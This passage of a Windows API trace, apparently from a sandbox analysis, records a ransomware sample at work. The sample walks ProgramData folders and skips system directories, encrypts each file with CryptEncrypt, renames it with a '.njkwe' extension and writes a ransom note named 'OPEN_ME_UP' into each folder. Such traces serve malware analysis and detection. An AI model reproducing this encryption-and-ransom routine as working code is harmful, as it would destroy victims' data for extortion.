lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0075.878] GetProcessHeap () returned 0xbe0000 [0075.878] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0075.878] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.878] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0075.879] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0075.879] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0075.879] CloseHandle (hObject=0x434) returned 1 [0075.879] GetProcessHeap () returned 0xbe0000 [0075.879] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0075.879] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe") returned 120 [0075.879] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\masterdatastore.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\masterdatastore.xml_r00t_{3sxle5}.njkwe")) returned 1 [0075.879] GetProcessHeap () returned 0xbe0000 [0075.880] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0075.880] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 1 [0075.880] lstrcmpiW (lpString1="Prov", lpString2="Windows") returned -1 [0075.880] lstrcmpiW (lpString1="Prov", lpString2="$Recycle.bin") returned 1 [0075.880] lstrcmpiW (lpString1="Prov", lpString2="System Volume Information") returned -1 [0075.880] lstrcmpiW (lpString1="Prov", lpString2="Program Files") returned 1 [0075.880] lstrcmpiW (lpString1="Prov", lpString2="Program Files (x86)") returned 1 [0075.880] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov") returned 85 [0075.880] lstrcmpW (lpString1="Prov", lpString2=".") returned 1 [0075.880] lstrcmpW (lpString1="Prov", lpString2="..") returned 1 [0075.880] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0075.880] GetProcessHeap () returned 0xbe0000 [0075.880] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0075.880] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\*") returned 87 [0075.880] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ce0 [0075.880] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.880] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.880] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.880] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.880] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.880] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\.") returned 87 [0075.880] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.880] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0075.880] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.880] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.880] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.880] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.880] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.880] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\..") returned 88 [0075.880] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.880] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.881] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime", cAlternateFileName="")) returned 1 [0075.881] lstrcmpiW (lpString1="RunTime", lpString2="Windows") returned -1 [0075.881] lstrcmpiW (lpString1="RunTime", lpString2="$Recycle.bin") returned 1 [0075.881] lstrcmpiW (lpString1="RunTime", lpString2="System Volume Information") returned -1 [0075.881] lstrcmpiW (lpString1="RunTime", lpString2="Program Files") returned 1 [0075.881] lstrcmpiW (lpString1="RunTime", lpString2="Program Files (x86)") returned 1 [0075.881] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime") returned 93 [0075.881] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1 [0075.881] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1 [0075.881] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0075.881] GetProcessHeap () returned 0xbe0000 [0075.881] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0075.881] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime\\*") returned 95 [0075.881] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a0a0 [0075.881] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.881] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.881] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.881] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.881] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.881] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime\\.") returned 95 [0075.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.881] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0075.881] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.881] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.881] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.881] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.881] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.881] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime\\..") returned 96 [0075.881] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.881] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.881] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ecd6b4, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53ecd6b4, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53ecd6b4, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_EnergyEstimationEngine.provxml", cAlternateFileName="")) returned 1 [0075.881] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Windows") returned -1 [0075.882] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="$Recycle.bin") returned 1 [0075.882] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="System Volume Information") returned -1 [0075.882] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Program Files") returned -1 [0075.882] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Program Files (x86)") returned -1 [0075.882] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml") returned 133 [0075.882] StrStrIW (lpFirst="0__Power_EnergyEstimationEngine.provxml", lpSrch=".njkwe") returned 0x0 [0075.882] lstrcmpW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.882] lstrcmpW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="taridd") returned -1 [0075.882] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime\\0__Power_Ener", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.882] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\prov\\runtime\\0__power_energyestimationengine.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0075.882] GetTickCount () returned 0x1153506 [0075.882] GetTickCount () returned 0x1153506 [0075.882] GetTickCount () returned 0x1153506 [0075.883] GetTickCount () returned 0x1153506 [0075.883] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0075.883] GetProcessHeap () returned 0xbe0000 [0075.883] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4f858 [0075.883] ReadFile (in: hFile=0x43c, lpBuffer=0xc4f858, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesRead=0x380edc4*=0x1cf, lpOverlapped=0x0) returned 1 [0075.884] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.884] WriteFile (in: hFile=0x43c, lpBuffer=0xc4f858*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesWritten=0x380edc4*=0x1cf, lpOverlapped=0x0) returned 1 [0075.884] GetProcessHeap () returned 0xbe0000 [0075.884] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4f858 | out: hHeap=0xbe0000) returned 1 [0075.884] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.884] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0075.885] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0075.885] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0075.885] CloseHandle (hObject=0x43c) returned 1 [0075.885] GetProcessHeap () returned 0xbe0000 [0075.885] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0075.885] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml_r00t_{3sXlE5}.njkwe") returned 153 [0075.885] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\prov\\runtime\\0__power_energyestimationengine.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\prov\\runtime\\0__power_energyestimationengine.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0075.886] GetProcessHeap () returned 0xbe0000 [0075.886] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0075.886] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ecd6b4, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53ecd6b4, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53ecd6b4, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_EnergyEstimationEngine.provxml", cAlternateFileName="")) returned 0 [0075.886] FindClose (in: hFindFile=0xc1a0a0 | out: hFindFile=0xc1a0a0) returned 1 [0075.886] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 125 [0075.886] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\prov\\runtime\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0075.886] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0075.887] CloseHandle (hObject=0x438) returned 1 [0075.887] GetProcessHeap () returned 0xbe0000 [0075.887] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0075.887] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ef390d, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53ef390d, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53ef390d, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x102, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0075.887] lstrcmpiW (lpString1="RunTime.xml", lpString2="Windows") returned -1 [0075.887] lstrcmpiW (lpString1="RunTime.xml", lpString2="$Recycle.bin") returned 1 [0075.887] lstrcmpiW (lpString1="RunTime.xml", lpString2="System Volume Information") returned -1 [0075.887] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files") returned 1 [0075.887] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files (x86)") returned 1 [0075.888] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime.xml") returned 97 [0075.888] StrStrIW (lpFirst="RunTime.xml", lpSrch=".njkwe") returned 0x0 [0075.888] lstrcmpW (lpString1="RunTime.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.888] lstrcmpW (lpString1="RunTime.xml", lpString2="taridd") returned -1 [0075.888] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.888] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0075.888] GetTickCount () returned 0x1153506 [0075.888] GetTickCount () returned 0x1153506 [0075.888] GetTickCount () returned 0x1153506 [0075.888] GetTickCount () returned 0x1153506 [0075.888] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0075.888] GetProcessHeap () returned 0xbe0000 [0075.888] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4e850 [0075.888] ReadFile (in: hFile=0x438, lpBuffer=0xc4e850, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesRead=0x380f04c*=0x102, lpOverlapped=0x0) returned 1 [0075.889] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffefe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.889] WriteFile (in: hFile=0x438, lpBuffer=0xc4e850*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesWritten=0x380f04c*=0x102, lpOverlapped=0x0) returned 1 [0075.889] GetProcessHeap () returned 0xbe0000 [0075.889] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4e850 | out: hHeap=0xbe0000) returned 1 [0075.889] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.889] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0075.890] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0075.890] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0075.890] CloseHandle (hObject=0x438) returned 1 [0075.890] GetProcessHeap () returned 0xbe0000 [0075.890] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0075.890] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe") returned 117 [0075.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\prov\\runtime.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\prov\\runtime.xml_r00t_{3sxle5}.njkwe")) returned 1 [0075.891] GetProcessHeap () returned 0xbe0000 [0075.891] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0075.891] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ef390d, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53ef390d, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53ef390d, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x102, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0075.891] FindClose (in: hFindFile=0xc19ce0 | out: hFindFile=0xc19ce0) returned 1 [0075.891] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0075.891] CreateFileW 